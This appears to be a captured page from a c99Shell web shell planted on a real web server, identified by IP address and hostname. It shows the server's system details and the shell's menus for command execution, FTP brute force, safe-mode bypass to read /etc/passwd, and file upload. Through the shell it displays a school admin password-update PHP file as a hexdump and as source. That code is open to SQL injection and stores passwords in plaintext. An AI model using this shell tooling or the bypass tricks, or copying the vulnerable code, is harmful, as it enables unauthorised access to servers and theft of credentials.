110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/admin/ drwxr-xr-x Free 52.63 GB of 127.8 GB (41.18%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/admin/ drwxr-xr-x
Free 52.63 GB of 127.8 GB (41.18%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: UpdatePwd.php (1.72 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Information:

Path	/var/www/html/manage/admin/UpdatePwd.php
Size	1.72 KB
MD5	a8421f596a20817d6a7b61f29b01d722
Owner/Group	apache/apache
Perms	-rw-r--r--
Create time	03/07/2013 18:31:17
Access time	11/07/2024 12:58:56
MODIFY time	02/04/2007 11:51:54

FULL HEXDUMP

00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8
00000300
00000318
00000330
00000348
00000360
00000378
00000390
000003A8
000003C0
000003D8
000003F0
00000408
00000420
00000438
00000450
00000468
00000480
00000498
000004B0
000004C8
000004E0
000004F8
00000510
00000528
00000540
00000558
00000570
00000588
000005A0
000005B8
000005D0
000005E8
00000600
00000618
00000630
00000648
00000660
00000678
00000690
000006A8
000006C0
000006D8

3C 3F 0A 20 73 65 73 73 69 6F 6E 5F 73 74 61 72 74 28 29 3B 0A 20 69 66
20 28 73 65 73 73 69 6F 6E 5F 69 73 5F 72 65 67 69 73 74 65 72 65 64 28
22 76 61 6C 69 64 5F 75 73 65 72 22 29 29 0A 20 7B 0A 09 69 6E 63 6C 75
64 65 28 22 2E 2E 2F 69 6E 63 6C 75 64 65 2F 46 75 6E 63 74 69 6F 6E 44
42 2E 70 68 70 22 29 3B 0A 09 43 6F 6E 6E 65 63 74 44 42 28 29 3B 20 0A
09 24 54 65 61 63 68 65 72 5F 63 6F 64 65 20 3D 20 68 74 6D 6C 73 70 65
63 69 61 6C 63 68 61 72 73 28 74 72 69 6D 28 24 5F 50 4F 53 54 5B 54 65
61 63 68 65 72 5F 63 6F 64 65 5D 29 29 3B 0A 20 20 20 24 55 73 65 72 6E
61 6D 65 20 3D 20 68 74 6D 6C 73 70 65 63 69 61 6C 63 68 61 72 73 28 74
72 69 6D 28 24 5F 50 4F 53 54 5B 55 73 65 72 6E 61 6D 65 5D 29 29 3B 0A
20 20 20 24 4E 65 77 50 61 73 73 77 6F 72 64 20 3D 20 68 74 6D 6C 73 70
65 63 69 61 6C 63 68 61 72 73 28 74 72 69 6D 28 24 5F 50 4F 53 54 5B 4E
65 77 50 61 73 73 77 6F 72 64 5D 29 29 3B 0A 20 20 20 20 24 50 61 73 73
77 6F 72 64 52 20 3D 20 24 4E 65 77 50 61 73 73 77 6F 72 64 3B 0A 09 24
50 61 73 73 77 6F 72 64 20 3D 20 6D 64 35 28 24 4E 65 77 50 61 73 73 77
6F 72 64 29 3B 0A 09 24 73 71 6C 20 3D 22 55 50 44 41 54 45 20 75 73 65
72 5F 74 62 20 53 45 54 20 55 73 65 72 6E 61 6D 65 3D 27 24 55 73 65 72
6E 61 6D 65 27 2C 50 61 73 73 77 6F 72 64 3D 27 24 50 61 73 73 77 6F 72
64 27 2C 50 61 73 73 77 6F 72 64 52 3D 27 24 50 61 73 73 77 6F 72 64 52
27 20 20 57 48 45 52 45 20 20 54 65 61 63 68 65 72 5F 63 6F 64 65 3D 27
24 54 65 61 63 68 65 72 5F 63 6F 64 65 27 20 41 4E 44 20 46 6C 61 67 3D
27 31 27 22 3B 0A 09 24 72 65 73 75 6C 74 20 20 3D 20 6D 79 73 71 6C 5F
71 75 65 72 79 28 24 73 71 6C 29 20 6F 72 20 64 69 65 28 22 55 70 64 61
74 65 20 45 72 72 6F 72 20 24 73 74 72 53 51 4C 22 2E 6D 79 73 71 6C 5F
65 72 72 6F 72 28 29 29 3B 0A 09 0A 09 24 73 71 6C 32 20 3D 22 55 50 44
41 54 45 20 70 65 72 73 6F 6E 61 6C 5F 74 62 20 20 53 45 54 20 20 55 73
65 72 6E 61 6D 65 3D 27 24 55 73 65 72 6E 61 6D 65 27 2C 50 61 73 73 77
6F 72 64 3D 27 24 50 61 73 73 77 6F 72 64 27 20 57 48 45 52 45 20 20 54
65 61 63 68 65 72 5F 63 6F 64 65 3D 27 24 54 65 61 63 68 65 72 5F 63 6F
64 65 27 22 3B 0A 09 24 72 65 73 75 6C 74 32 20 20 3D 20 6D 79 73 71 6C
5F 71 75 65 72 79 28 24 73 71 6C 32 29 20 6F 72 20 64 69 65 28 22 55 70
64 61 74 65 20 45 72 72 6F 72 20 24 73 74 72 53 51 4C 22 2E 6D 79 73 71
6C 5F 65 72 72 6F 72 28 29 29 3B 0A 09 0A 09 69 66 20 28 24 72 65 73 75
6C 74 20 26 26 20 24 72 65 73 75 6C 74 32 29 0A 09 20 7B 0A 09 65 63 68
6F 22 3C 63 65 6E 74 65 72 3E 22 3B 0A 09 65 63 68 6F 20 22 3C 66 6F 6E
74 20 66 61 63 65 3D 5C 22 54 61 68 6F 6D 61 5C 22 20 53 69 7A 65 3D 5C
22 34 5C 22 20 63 6F 6C 6F 72 3D 5C 22 23 30 30 30 30 46 46 5C 22 3E E1
A1 E9 E4 A2 E0 CA C3 E7 A8 CA C1 BA D9 C3 B3 EC 3C 2F 66 6F 6E 74 3E 22
3B 0A 09 65 63 68 6F 20 22 3C 62 72 3E 3C 66 6F 6E 74 20 66 61 63 65 3D
5C 22 54 61 68 6F 6D 61 5C 22 20 53 69 7A 65 3D 5C 22 32 5C 22 20 63 6F
6C 6F 72 3D 5C 22 23 46 46 30 30 30 30 5C 22 3E A1 C3 D8 B3 D2 20 72 65
66 72 65 73 68 20 CB B9 E9 D2 C3 D2 C2 A1 D2 C3 CD D5 A1 A4 C3 D1 E9 A7
3C 2F 66 6F 6E 74 3E 22 3B 0A 09 65 63 68 6F 20 22 3C 62 72 3E 3C 69 6E
70 75 74 20 74 79 70 65 3D 5C 22 72 65 73 65 74 5C 22 20 76 61 6C 75 65
3D 5C 22 43 6C 6F 73 65 20 57 69 6E 64 6F 77 73 5C 22 20 6F 6E 63 6C 69
63 6B 3D 5C 22 6A 61 76 61 73 63 72 69 70 74 3A 70 61 72 65 6E 74 2E 63
6C 6F 73 65 28 29 3B 5C 22 20 73 74 79 6C 65 3D 5C 22 66 6F 6E 74 2D 77
65 69 67 68 74 3A 62 6F 6C 64 3B 63 6F 6C 6F 72 3A 66 6F 6E 74 2D 66 61
6D 69 6C 79 3A 54 6F 68 6F 6D 61 3B 5C 22 3E 22 3B 0A 09 65 63 68 6F 22
3C 2F 63 65 6E 74 65 72 3E 22 3B 0A 09 20 7D 0A 09 2F 2F 68 65 61 64 65
72 28 22 4C 6F 63 61 74 69 6F 6E 3A 41 6C 6C 55 73 65 72 4C 69 73 74 2E
70 68 70 22 29 3B 09 09 09 09 0A 09 43 6C 6F 73 65 44 42 28 29 3B 0A 09
7D 0A 65 6C 73 65 0A 7B 0A 20 20 20 20 65 63 68 6F 22 3C 62 6F 64 79 20
62 67 63 6F 6C 6F 72 3D 5C 22 23 43 43 43 43 43 43 5C 22 3E 22 3B 0A 09
20 65 63 68 6F 22 3C 6D 65 74 61 20 68 74 74 70 2D 65 71 75 69 76 3D 5C
22 72 65 66 72 65 73 68 5C 22 20 63 6F 6E 74 65 6E 74 3D 5C 22 33 3B 55
52 4C 3D 2E 2E 2F 6C 6F 67 6F 75 74 2E 70 68 70 5C 22 20 74 61 72 67 65
74 3D 5C 22 6D 61 69 6E 46 72 61 6D 65 5C 22 3E 5C 6E 22 3B 0A 20 20 20
20 20 65 63 68 6F 22 3C 63 65 6E 74 65 72 3E 22 3B 0A 09 20 20 65 63 68
6F 22 3C 62 72 3E 3C 62 72 3E 3C 62 72 3E 3C 62 3E 3C 66 6F 6E 74 20 66
61 63 65 3D 5C 22 54 61 68 6F 6D 61 5C 22 20 73 69 7A 65 3D 5C 22 34 5C
22 20 63 6F 6C 6F 72 3D 5C 22 23 46 46 30 30 30 30 5C 22 3E 50 6C 65 61
73 65 20 4C 6F 67 69 6E 3C 2F 66 6F 6E 74 3E 20 3C 2F 62 3E 3C 62 72 3E
22 3B 0A 20 20 20 20 20 20 65 63 68 6F 22 3C 62 72 3E 3C 62 72 3E 3C 66
6F 6E 74 20 66 61 63 65 3D 5C 22 54 61 68 6F 6D 61 5C 22 20 73 69 7A 65
3D 5C 22 31 30 5C 22 20 63 6F 6C 6F 72 3D 5C 22 23 30 30 30 30 30 30 5C
22 3E 20 45 52 52 4F 52 20 34 30 34 20 50 45 52 4D 49 53 49 4F 4E 20 44
45 4E 59 3C 2F 66 6F 6E 74 3E 3C 62 72 3E 22 3B 0A 09 20 20 65 63 68 6F
22 3C 62 72 3E 3C 66 6F 6E 74 20 66 61 63 65 3D 5C 22 54 61 68 6F 6D 61
5C 22 20 73 69 7A 65 3D 5C 22 34 5C 22 20 63 6F 6C 6F 72 3D 5C 22 23 30
30 30 30 30 30 5C 22 3E 20 A4 D8 B3 E4 C1 E8 C1 D5 CA D4 B7 B8 EC E3 AA
E9 A7 D2 B9 3C 2F 66 6F 6E 74 3E 22 3B 0A 09 20 20 65 63 68 6F 22 3C 2F
63 65 6E 74 65 72 3E 22 3B 0A 09 20 20 65 63 68 6F 22 3C 2F 62 6F 64 79
3E 22 3B 0A 7D 20 0A 0A 3F 3E 0A

<? session_start(); if
(session_is_registered(
"valid_user")) { inclu
de("../include/FunctionD
B.php"); ConnectDB();
$Teacher_code = htmlspe
cialchars(trim($_POST[Te
acher_code])); $Usern
ame = htmlspecialchars(t
rim($_POST[Username]));
 $NewPassword = htmlsp
ecialchars(trim($_POST[N
ewPassword])); $Pass
wordR = $NewPassword; $
Password = md5($NewPassw
ord); $sql ="UPDATE use
r_tb SET Username='$User
name',Password='$Passwor
d',PasswordR='$PasswordR
' WHERE Teacher_code='
$Teacher_code' AND Flag=
'1'"; $result = mysql_
query($sql) or die("Upda
te Error $strSQL".mysql_
error()); $sql2 ="UPD
ATE personal_tb SET Us
ername='$Username',Passw
ord='$Password' WHERE T
eacher_code='$Teacher_co
de'"; $result2 = mysql
_query($sql2) or die("Up
date Error $strSQL".mysq
l_error()); if ($resu
lt && $result2) { ech
o"<center>"; echo "<fon
t face=\"Tahoma\" Size=\
"4\" color=\"#0000FF\">б
ЎйдўаКГзЁКБєЩГім"
; echo " ЎГШіТ re
fresh Л№йТГТВЎТГНХЎ¤ГСй§
"; echo " <in
put type=\"reset\" value
=\"Close Windows\" oncli
ck=\"javascript:parent.c
lose();\" style=\"font-w
eight:bold;color:font-fa
mily:Tohoma;\">"; echo"
</center>"; } //heade
r("Location:AllUserList.
php"); CloseDB();
} else { echo"<body
bgcolor=\"#CCCCCC\">";
echo"<meta http-equiv=\
"refresh\" content=\"3;U
RL=../logout.php\" targe
t=\"mainFrame\">\n";
 echo"<center>"; ech
o" Plea
se Login 
"; echo" <f
ont face=\"Tahoma\" size
=\"10\" color=\"#000000\
"> ERROR 404 PERMISION D
ENY "; echo
" ¤ШідБиБХКФ·ёмгЄ
й§Т№"; echo"</
center>"; echo"</body
>"; } ?>

HEXDUMP: [Full] [Preview]
Base64: [Encode] [+chunk] [+chunk+quotes] [Decode]

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0163 ]--